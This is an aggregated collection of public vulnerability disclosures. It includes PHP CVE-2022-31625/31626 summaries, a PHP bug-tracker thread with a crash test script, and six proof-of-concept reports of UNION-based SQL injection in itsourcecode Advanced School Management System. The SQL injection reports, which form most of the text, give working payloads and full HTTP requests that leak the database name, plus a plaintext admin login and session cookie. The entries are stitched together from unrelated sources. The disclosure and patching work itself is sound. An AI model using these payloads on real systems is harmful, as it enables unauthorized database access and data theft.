In PHP versions 7.4.x below 7.4.30, 8.0.x below 8.0.20, and 8.1.x below 8.1.7, when pdo_mysql extension with mysqlnd driver, if the third party is allowed to supply host to connect to and the password for the connection, password of excessive length can trigger a buffer overflow in PHP, which can lead to a remote code execution vulnerability.

CVE-2022-31626: mysqlnd/pdo password buffer overflow leading to RCE

In PHP versions 7.4.x below 7.4.30, 8.0.x below 8.0.20, and 8.1.x below 8.1.7, when using Postgres database extension, supplying invalid parameters to the parametrized query may lead to PHP attempting to free memory using uninitialized data as pointers. This could lead to RCE vulnerability or denial of service.

Sec Bug #81720

Uninitialized array in pg\_query\_params() leading to RCE

Submitted:

2022-05-16 14:50 UTC

Modified:

2022-06-06 07:13 UTC

From:

c dot fol at ambionics dot io

Assigned:

stas (profile)

Status:

Closed

Package:

PostgreSQL related

PHP Version:

8.1.6

OS:

Private report:

No

CVE-ID:

2022-31625

 **\[2022-05-16 14:50 UTC\] c dot fol at ambionics dot io**

Description:
------------
Hello PHP team,

in PHP\_FUNCTION(pg\_query\_params), the array meant to store the char\* representation of the query parameters is allocated on the heap, but not cleared:

\`\`\`
params = (char \*\*)safe\_emalloc(sizeof(char \*), num\_params, 0);
\`\`\`

If a conversion error happens (for instance, one of the params is an object), \`\_php\_pgsql\_free\_params()\` gets called \*on the whole array\*. Since the array is not initialized, a lingering value from a previous request can get freed, leading in the end to remote code execution.

To patch, use calloc or memset-0 it.

There are other functions where you use basically the same code (if cannot convert to string, then free all params) so it might be worth a look.

Patch: 

\`\`\`
- \_php\_pgsql\_free\_params(params, num\_params);
+ \_php\_pgsql\_free\_params(params, i);
\`\`\`

Best regards,
Charles Fol
ambionics.io


Test script:
---------------
<?php

$strings = \[\];

function uenc($v)
{
    $out = '';
    for($i=0; $i<strlen($v);$i++)
    {
        $out .= '\\u' . '00' . str\_pad(dechex(ord($v\[$i\])), 2, '0', STR\_PAD\_LEFT);
    }
    return '"' . $out . '"';
}

$json = 
    '{"a": 1, "args":\[
        "A","A","A",
        {}
    \]}'
;
$c = pg\_connect('host=172.17.0.3 user=postgres password=password');

$data = json\_decode($json);

$resultXXX = pg\_query\_params($c, 'SELECT \* FROM test WHERE x NOT IN ($1)', $data->args);
// var\_dump(pg\_fetch\_all($resultXXX));

Expected result:
----------------
No crash.

Actual result:
--------------
Crash.

**Patches**

Add a Patch

**Pull Requests**

Add a Pull Request

**History**

AllCommentsChangesGit/SVN commitsRelated reports

 **\[2022-05-17 09:45 UTC\] cmb@php.net**

\-Status: Open +Status: Verified \-Assigned To: +Assigned To: cmb

 **\[2022-05-17 09:45 UTC\] cmb@php.net**

Thanks for reporting!  I can confirm the issue.  I'll have a
closer look.

 **\[2022-05-17 11:17 UTC\] c dot fol at ambionics dot io**

Cool !

I'm wondering if you also got the previous bug, #81719, related to PDO. I didn't receive a confirmation email.

 **\[2022-05-17 11:35 UTC\] cmb@php.net**

\-Assigned To: cmb +Assigned To: stas

 **\[2022-05-17 11:35 UTC\] cmb@php.net**

Proposed patch:
<https://gist.github.com/cmb69/b2b5ab0cb54a5683fe3aff4c7c09f7c2\>.

While fixing this issue, I noticed that pg\_send\_execute() tries to
convert the $params elements to string, but checks the wrong
variable (\`tmp\` instead of \`tmp\_str\`), what may cause a segfault.
The patch also fixes this.

As to whether this is actually a security issue: any potential
exploit requires the script to pass values which are not coercible
to string to the $params parameter of \`pg\_query\_params()\` or
\`pg\_send\_execute()\`.  That might be regarded as sloppy userland
programming, so I'm not sure if we classify this as security
issue.  On the other hand, the documentation is not explicit about
this conversion to string requirement (although the placeholders
hint at it).

Stas, what do you think?

> I'm wondering if you also got the previous bug, #81719, related
> to PDO.

I'll have a look at that right away.

 **\[2022-05-25 21:36 UTC\] stas@php.net**

\-CVE-ID: needed +CVE-ID: 2022-31625

 **\[2022-06-06 07:13 UTC\] git@php.net**

\-Status: Verified +Status: Closed

CVE-2022-31625: Uninitialized array in pg_query_params() leading to RCE

Microsoft SQL Server Remote Code Execution Vulnerability.

CVE-2022-29143

itsourcecode Advanced School Management System v1.0 is vulnerable to SQL Injection via /school/model/get_classroom.php?id=.

Permalink

Cannot retrieve contributors at this time

**Advanced School Management System v1.0 by itsourcecode.com has SQL injection**

Login account: suarez081119@gmail.com/12345 (Super Admin account)

vendors: https://itsourcecode.com/free-projects/php-project/advanced-school-management-system-in-php-with-source-code/

Vulnerability File: /school/model/get\_classroom.php?id=

Vulnerability location: /school/model/get\_classroom.php?id=,id

\[+\] Payload: /school/model/get\_classroom.php?id=-18%20union%20select%201,database(),3--+ // Leak place ---> id

Current database name: std\_db,length is 6

GET /school/model/get\_classroom.php?id\=\-18%20union%20select%201,database(),3\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=kh42r202aj35u61brcutn42s96
Connection: close

CVE-2022-32370: bug_report/SQLi-2.md at main · k0xx11/bug_report

itsourcecode Advanced School Management System v1.0 is vulnerable to SQL Injection via /school/model/get_teacher.php?id=.

**Advanced School Management System v1.0 by itsourcecode.com has SQL injection**

Login account: suarez081119@gmail.com/12345 (Super Admin account)

vendors: https://itsourcecode.com/free-projects/php-project/advanced-school-management-system-in-php-with-source-code/

Vulnerability File: /school/model/get\_teacher.php?id=

Vulnerability location: /school/model/get\_teacher.php?id=,id

\[+\] Payload: /school/model/get\_teacher.php?id=-10%20union%20select%201,database(),3,4,5,6,7,8,9,10--+ // Leak place ---> id

Current database name: std\_db,length is 6

GET /school/model/get\_teacher.php?id\=\-10%20union%20select%201,database(),3,4,5,6,7,8,9,10\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=kh42r202aj35u61brcutn42s96
Connection: close

CVE-2022-32371: bug_report/SQLi-1.md at main · k0xx11/bug_report

itsourcecode Advanced School Management System v1.0 is vulnerable to SQL Injection via /school/model/get_subject.php?id=.

Permalink

**Advanced School Management System v1.0 by itsourcecode.com has SQL injection**

Login account: suarez081119@gmail.com/12345 (Super Admin account)

vendors: https://itsourcecode.com/free-projects/php-project/advanced-school-management-system-in-php-with-source-code/

Vulnerability File: /school/model/get\_subject.php?id=

Vulnerability location: /school/model/get\_subject.php?id=,id

\[+\] Payload: /school/model/get\_subject.php?id=-15%20union%20select%201,database()--+ // Leak place ---> id

Current database name: std\_db,length is 6

GET /school/model/get\_subject.php?id\=\-15%20union%20select%201,database()\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=kh42r202aj35u61brcutn42s96
Connection: close

CVE-2022-32372: bug_report/SQLi-4.md at main · k0xx11/bug_report

itsourcecode Advanced School Management System v1.0 is vulnerable to SQL Injection via /school/model/get_subject_routing.php?id=.

**Advanced School Management System v1.0 by itsourcecode.com has SQL injection**

Login account: suarez081119@gmail.com/12345 (Super Admin account)

vendors: https://itsourcecode.com/free-projects/php-project/advanced-school-management-system-in-php-with-source-code/

Vulnerability File: /school/model/get\_subject\_routing.php?id=

Vulnerability location: /school/model/get\_subject\_routing.php?id=,id

\[+\] Payload: /school/model/get\_subject\_routing.php?id=-23%20union%20select%201,2,database(),4,5--+ // Leak place ---> id

Current database name: std\_db,length is 6

GET /school/model/get\_subject\_routing.php?id\=\-23%20union%20select%201,2,database(),4,5\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=kh42r202aj35u61brcutn42s96
Connection: close

CVE-2022-32374: bug_report/SQLi-5.md at main · k0xx11/bug_report

itsourcecode Advanced School Management System v1.0 is vulnerable to SQL Injection via /school/model/get_grade.php?id=.

**Advanced School Management System v1.0 by itsourcecode.com has SQL injection**

Login account: suarez081119@gmail.com/12345 (Super Admin account)

vendors: https://itsourcecode.com/free-projects/php-project/advanced-school-management-system-in-php-with-source-code/

Vulnerability File: /school/model/get\_grade.php?id=

Vulnerability location: /school/model/get\_grade.php?id=,id

\[+\] Payload: /school/model/get\_grade.php?id=-13%20union%20select%201,database(),3,4--+ // Leak place ---> id

Current database name: std\_db,length is 6

GET /school/model/get\_grade.php?id\=\-13%20union%20select%201,database(),3,4\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=kh42r202aj35u61brcutn42s96
Connection: close

CVE-2022-32368: bug_report/SQLi-3.md at main · k0xx11/bug_report

itsourcecode Advanced School Management System v1.0 is vulnerable to SQL Injection via /school/model/get_exam.php?id=.

Permalink

**Advanced School Management System v1.0 by itsourcecode.com has SQL injection**

Login account: suarez081119@gmail.com/12345 (Super Admin account)

vendors: https://itsourcecode.com/free-projects/php-project/advanced-school-management-system-in-php-with-source-code/

Vulnerability File: /school/model/get\_exam.php?id=

Vulnerability location: /school/model/get\_exam.php?id=,id

\[+\] Payload: /school/model/get\_exam.php?id=-1%20union%20select%201,database()--+ // Leak place ---> id

Current database name: std\_db,length is 6

GET /school/model/get\_exam.php?id\=\-1%20union%20select%201,database()\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=kh42r202aj35u61brcutn42s96
Connection: close

CVE-2022-32373: bug_report/SQLi-7.md at main · k0xx11/bug_report

A Stored Cross-Site Scripting (XSS) vulnerability was discovered in ProjectGeneral/edit_project_settings.php in REDCap 12.0.11. This issue allows any user with project management permissions to inject arbitrary code into the project title (app_title) field when editing an existing project. The payload is then reflected within the title tag of the page.

Tag

#sql